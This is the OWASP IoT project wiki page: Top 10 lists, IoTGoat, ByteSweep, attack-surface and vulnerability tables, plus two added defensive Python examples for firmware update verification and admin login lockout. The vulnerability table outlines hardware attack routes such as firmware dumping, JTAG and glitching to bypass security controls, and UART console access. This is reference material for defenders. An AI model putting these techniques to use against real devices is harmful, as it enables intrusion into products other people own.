* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is one-to-one; where there is no exact match, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform that allows IoT device makers, large and small, to conduct fully automated security checks before they ship firmware.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
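The Update Mechanism row above (updates not signed, update verification, malicious update) and the "Firmware downgrade possibility" item under Device Firmware list what a device's updater must defend against. The following is an added example, not code from the OWASP IoT project or from any vendor, showing the device-side checks in Python: the manifest signature is verified before any field in it is trusted, the image hash is compared against the signed manifest, and the version must move forward so that a signed but vulnerable older release cannot be reinstalled. HMAC-SHA256 with a constructed key stands in for a detached asymmetric signature so that the example runs on the standard library alone; a real device would verify an Ed25519 or ECDSA signature with a public key held in read-only storage. The names verify_update, example-device and the key bytes are assumptions made for this example.<br />
<br />
```python
"""Device-side firmware update verification.

Added example, not OWASP project code. HMAC-SHA256 stands in for a real
detached signature so this runs on the standard library alone; a production
device verifies an asymmetric signature (e.g. Ed25519) with a public key in
read-only storage, so a compromised unit cannot forge updates for others.
"""
import hashlib
import hmac
import json
from dataclasses import dataclass

# Constructed key for this example only; a real design ships a public key.
VENDOR_VERIFICATION_KEY = b"example-vendor-signing-key-not-real"
PRODUCT_ID = "example-device"   # constructed product identifier


@dataclass
class Verdict:
    ok: bool
    reason: str


def sign_manifest(manifest: dict, key: bytes) -> bytes:
    """Vendor side: tag over the canonical (sorted, compact) JSON manifest."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).digest()


def verify_update(manifest: dict, signature: bytes, image: bytes,
                  installed_version: int, key: bytes = VENDOR_VERIFICATION_KEY) -> Verdict:
    """Device side: accept the update only if every check passes, in this order."""
    # 1. Authenticity: nothing in the manifest is trusted before its signature
    #    checks out. compare_digest avoids a timing side channel.
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return Verdict(False, "manifest signature invalid")

    # 2. Manifest sanity: required fields with the expected types and product.
    try:
        version = int(manifest["version"])
        image_sha256 = str(manifest["image_sha256"])
        product = str(manifest["product"])
    except (KeyError, TypeError, ValueError):
        return Verdict(False, "manifest malformed")
    if product != PRODUCT_ID:
        return Verdict(False, "manifest is for a different product")

    # 3. Anti-rollback: a signed but older (vulnerable) release must be refused;
    #    this is the "firmware downgrade possibility" item in the table above.
    if version <= installed_version:
        return Verdict(False, f"rollback refused: {version} <= {installed_version}")

    # 4. Integrity: the image must hash to the value the signed manifest names.
    actual = hashlib.sha256(image).hexdigest()
    if not hmac.compare_digest(actual, image_sha256):
        return Verdict(False, "image hash mismatch")

    return Verdict(True, f"update to version {version} accepted")


def demo() -> dict:
    """Run the good path and the main failure modes on constructed data."""
    image = b"\x7fELF constructed firmware image bytes"
    manifest = {"product": PRODUCT_ID, "version": 12,
                "image_sha256": hashlib.sha256(image).hexdigest()}
    sig = sign_manifest(manifest, VENDOR_VERIFICATION_KEY)
    return {
        "genuine": verify_update(manifest, sig, image, installed_version=11),
        "rollback": verify_update(manifest, sig, image, installed_version=12),
        "tampered_image": verify_update(manifest, sig, image + b"\x00", installed_version=11),
        # Editing any manifest field (here the version) invalidates the signature.
        "forged_manifest": verify_update(dict(manifest, version=99), sig, image, installed_version=11),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} ok={verdict.ok} ({verdict.reason})")
```

The order of the checks matters: the signature is checked first so that a malformed or hostile manifest is never parsed for its version or hash, and the version comparison is done against the signed value rather than against anything the transport layer reports. Transport encryption (TLS) is still needed on top of this to keep the update file itself from being read in transit, but it does not replace the signature.<br />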
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. SSL v2 is still in use<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
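The Username Enumeration, Weak Passwords and Account Lockout rows above describe the absence of three controls on the authentication mechanism. The following is an added example, not code from the OWASP IoT project, implementing those controls in Python for a device administrative interface: one failure message and one hashing cost for unknown users, wrong passwords and locked accounts alike; a password policy that refuses trivial and factory-default passwords at setup; and a lockout after five consecutive failures. The class name AdminAuth, the thresholds, the deny-list and the factory default are assumptions for this example; storage is in memory and hashing uses the standard library's scrypt.<br />
<br />
```python
"""Credential-management controls for an IoT administrative interface.

Added example, not OWASP project code. Implements the controls whose absence
the Username Enumeration, Weak Passwords and Account Lockout rows describe:
one failure message for every cause, a policy that refuses trivial and
factory-default passwords, and a lockout after repeated failures. Names,
thresholds and the deny-list are constructed for this example.
"""
import hashlib
import hmac
import os
from typing import Callable, Dict, Optional, Tuple

MAX_FAILURES = 5            # lock after this many consecutive failures
LOCKOUT_SECONDS = 300       # how long the account stays locked
FAILURE_MESSAGE = "invalid username or password"   # identical for every cause
WEAK_PASSWORDS = {"1234", "123456", "12345678", "password", "admin"}
FACTORY_DEFAULT = "admin"   # the password the constructed device ships with


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)


def password_policy_violation(password: str) -> Optional[str]:
    """Return why a password is refused, or None if it is acceptable."""
    if password.lower() in WEAK_PASSWORDS or password == FACTORY_DEFAULT:
        return "trivial or factory-default password"
    if len(password) < 12:
        return "shorter than 12 characters"
    if len(set(password)) < 4:
        return "too few distinct characters"
    return None


class AdminAuth:
    def __init__(self, clock: Callable[[], float]):
        self._clock = clock                                   # injectable time source
        self._users: Dict[str, Tuple[bytes, bytes]] = {}      # user -> (salt, hash)
        self._failures: Dict[str, Tuple[int, float]] = {}     # user -> (count, locked_until)

    def set_password(self, username: str, password: str) -> None:
        reason = password_policy_violation(password)
        if reason:
            raise ValueError(f"password rejected: {reason}")
        salt = os.urandom(16)
        self._users[username] = (salt, _hash_password(password, salt))

    def is_locked(self, username: str) -> bool:
        return self._clock() < self._failures.get(username, (0, 0.0))[1]

    def login(self, username: str, password: str) -> Tuple[bool, str]:
        now = self._clock()
        count, locked_until = self._failures.get(username, (0, 0.0))
        if now < locked_until:
            return False, FAILURE_MESSAGE     # lock state is not revealed either
        record = self._users.get(username)
        if record is None:
            # Unknown user: spend the same hashing cost so the response time
            # does not tell valid usernames from invalid ones.
            _hash_password(password, b"\x00" * 16)
            ok = False
        else:
            salt, stored = record
            ok = hmac.compare_digest(_hash_password(password, salt), stored)
        if ok:
            self._failures.pop(username, None)
            return True, "ok"
        count += 1
        locked_until = now + LOCKOUT_SECONDS if count >= MAX_FAILURES else 0.0
        self._failures[username] = (count, locked_until)
        return False, FAILURE_MESSAGE


def demo() -> dict:
    """Walk through setup, a brute-force burst, the lockout and its expiry."""
    clock = {"t": 1000.0}
    auth = AdminAuth(lambda: clock["t"])
    results = {}
    try:
        auth.set_password("admin", FACTORY_DEFAULT)   # must not survive setup
    except ValueError as err:
        results["default_rejected"] = str(err)
    auth.set_password("admin", "correct horse battery staple")
    results["unknown_user"] = auth.login("nobody", "anything")
    results["wrong_passwords"] = [auth.login("admin", f"guess{i}") for i in range(MAX_FAILURES)]
    results["locked"] = auth.is_locked("admin")
    results["correct_while_locked"] = auth.login("admin", "correct horse battery staple")
    clock["t"] += LOCKOUT_SECONDS + 1
    results["correct_after_lockout"] = auth.login("admin", "correct horse battery staple")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The clock is injected so the lockout can be tested without waiting; on a device it would be a monotonic time source, and the failure counters should be persisted across reboots so that a power cycle does not reset the lockout.<br />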
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
